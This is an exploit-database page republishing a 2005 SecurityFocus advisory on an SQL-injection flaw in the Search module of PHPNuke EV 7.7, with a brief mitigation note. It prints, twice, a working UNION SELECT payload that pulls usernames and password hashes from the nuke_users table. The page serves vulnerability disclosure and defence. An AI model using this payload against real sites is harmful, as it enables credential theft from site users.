header-logo
Suggest Exploit
vendor:
PHPNuke EV
by:
SecurityFocus
7.5
CVSS
HIGH
SQL-injection
89
CWE
Product Name: PHPNuke EV
Affected Version From: 7.7
Affected Version To: 7.7
Patch Exists: NO
Related CWE: N/A
CPE: a:phpnuke:phpnuke_ev
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

PHPNuke EV SQL-injection Vulnerability

PHPNuke EV is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. Example proof-of-concept code has been provided: navigate to http://www.example.com/modules.php?name=Search and type in s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

Mitigation:

Input validation should be used to ensure that untrusted input is rejected.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16186/info

PHPNuke EV is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

PHPNuke EV version 7.7 is vulnerable; earlier versions may also be affected. 

Example proof-of-concept code has been provided:


navigate to http://www.example.com/modules.php?name=Search and type in

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

Navigation

Suggest Exploit

Services By CQR